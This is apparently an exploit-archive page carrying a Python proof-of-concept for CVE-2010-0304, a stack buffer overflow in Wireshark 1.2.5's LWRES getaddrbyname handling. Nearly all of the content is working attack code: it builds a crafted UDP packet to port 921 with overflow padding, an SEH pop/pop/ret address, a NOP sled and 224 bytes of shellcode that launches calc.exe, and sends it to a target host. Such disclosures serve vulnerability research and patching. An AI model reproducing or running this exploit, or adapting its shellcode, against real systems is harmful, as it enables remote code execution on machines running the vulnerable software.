Wireshark 1.2.5 LWRES getaddrbyname Buffer Overflow

Wireshark 1.2.5 LWRES getaddrbyname Buffer Overflow: Posted Feb 15, 2010; Authored by nullthreat, Pure; Wireshark version 1.2.5 LWRES getaddrbyname stack buffer overflow exploit that spawns calc.exe.suffers from a buffer overflow vulnerability.; tags | exploit, overflow; SHA-256 | 8c2dc66b69658bc18247486f4af5756f562eefdfc9bb8c34ec543acd3c1043df; Download | Favorite | View

Wireshark 1.2.5 LWRES getaddrbyname Buffer Overflow



# Exploit Title: Wireshark 1.2.5 LWRES getaddrbyname BOF - Calc.exe
# Date: 2-14-2010
# Author: Nullthreat and Pure|Hate
# Software Link: http://media-2.cacetech.com/wireshark/win32/wireshark-win32-1.2.5.exe
# Version: 1.2.5
# Tested on: Windows XP SP2
# CVE : 2010-0304
# OSVDB-ID: 61987<http://osvdb.org/show/osvdb/61987>
# Code :
#!/usr/bin/env python

# Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow
# Discovered by babi
# Exploit Dev by Nullthreat & Pure|Hate


import socket, sys

try:
  host = sys.argv[1]
except:
  print "usage: " + sys.argv[0] + " <host>"
  exit(2)

port = 921
addr = (host, port)

leng = 9150
high = int(leng / 256)
low = leng & 255

crash = ("A" * 2128)

# Short jump
jmp = "\x90\x90\x06\xeb"

# pop/pop/ret in pcre3 0x61b4121b
ppr = "\x1b\x12\xb4\x61"

nop  = ("\x90" * 24)

# 224 bytes = calc.exe
shellcode = (
"\xbf\x86\x0a\x33\xa0\x2b\xc9\xda\xd9\xd9\x74\x24\xf4\xb1"
"\x32\x5e\x31\x7e\x11\x03\x7e\x11\x83\xc6\x82\xe8\xc6\x5c"
"\x62\x65\x28\x9d\x72\x16\xa0\x78\x43\x04\xd6\x09\xf1\x98"
"\x9c\x5c\xf9\x53\xf0\x74\x8a\x16\xdd\x7b\x3b\x9c\x3b\xb5"
"\xbc\x10\x84\x19\x7e\x32\x78\x60\x52\x94\x41\xab\xa7\xd5"
"\x86\xd6\x47\x87\x5f\x9c\xf5\x38\xeb\xe0\xc5\x39\x3b\x6f"
"\x75\x42\x3e\xb0\x01\xf8\x41\xe1\xb9\x77\x09\x19\xb2\xd0"
"\xaa\x18\x17\x03\x96\x53\x1c\xf0\x6c\x62\xf4\xc8\x8d\x54"
"\x38\x86\xb3\x58\xb5\xd6\xf4\x5f\x25\xad\x0e\x9c\xd8\xb6"
"\xd4\xde\x06\x32\xc9\x79\xcd\xe4\x29\x7b\x02\x72\xb9\x77"
"\xef\xf0\xe5\x9b\xee\xd5\x9d\xa0\x7b\xd8\x71\x21\x3f\xff"
"\x55\x69\xe4\x9e\xcc\xd7\x4b\x9e\x0f\xbf\x34\x3a\x5b\x52"
"\x21\x3c\x06\x39\xb4\xcc\x3c\x04\xb6\xce\x3e\x27\xde\xff"
"\xb5\xa8\x99\xff\x1f\x8d\x55\x4a\x3d\xa4\xfd\x13\xd7\xf4"
"\x60\xa4\x0d\x3a\x9c\x27\xa4\xc3\x5b\x37\xcd\xc6\x20\xff"
"\x3d\xbb\x39\x6a\x42\x68\x3a\xbf\x21\xef\xa8\x23\xa6\xe5"
)

crash2 = ("\xcc" * 6752)

data  = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
data += "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
data += "\x00\x00\x00\x01"
data += chr(high) + chr(low) + crash + jmp + ppr + nop  + shellcode + crash2 + "\x00\x00"

udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
  udps.sendto(data, addr)
except:
  print "can't lookup host"
  exit(1)

udps.close()
exit(0)

Top Authors In Last 30 Days

Red Hat 297 files
Ubuntu 66 files
Debian 33 files
Gentoo 28 files
LiquidWorm 10 files
nu11secur1ty 7 files
Adam Gowdiak 4 files
gabe_k 3 files
liquidsky 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,036)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,495)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,567)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,739)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,489)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

Wireshark 1.2.5 LWRES getaddrbyname Buffer Overflow

Wireshark 1.2.5 LWRES getaddrbyname Buffer Overflow

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Wireshark 1.2.5 LWRES getaddrbyname Buffer Overflow

Share This

Wireshark 1.2.5 LWRES getaddrbyname Buffer Overflow

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems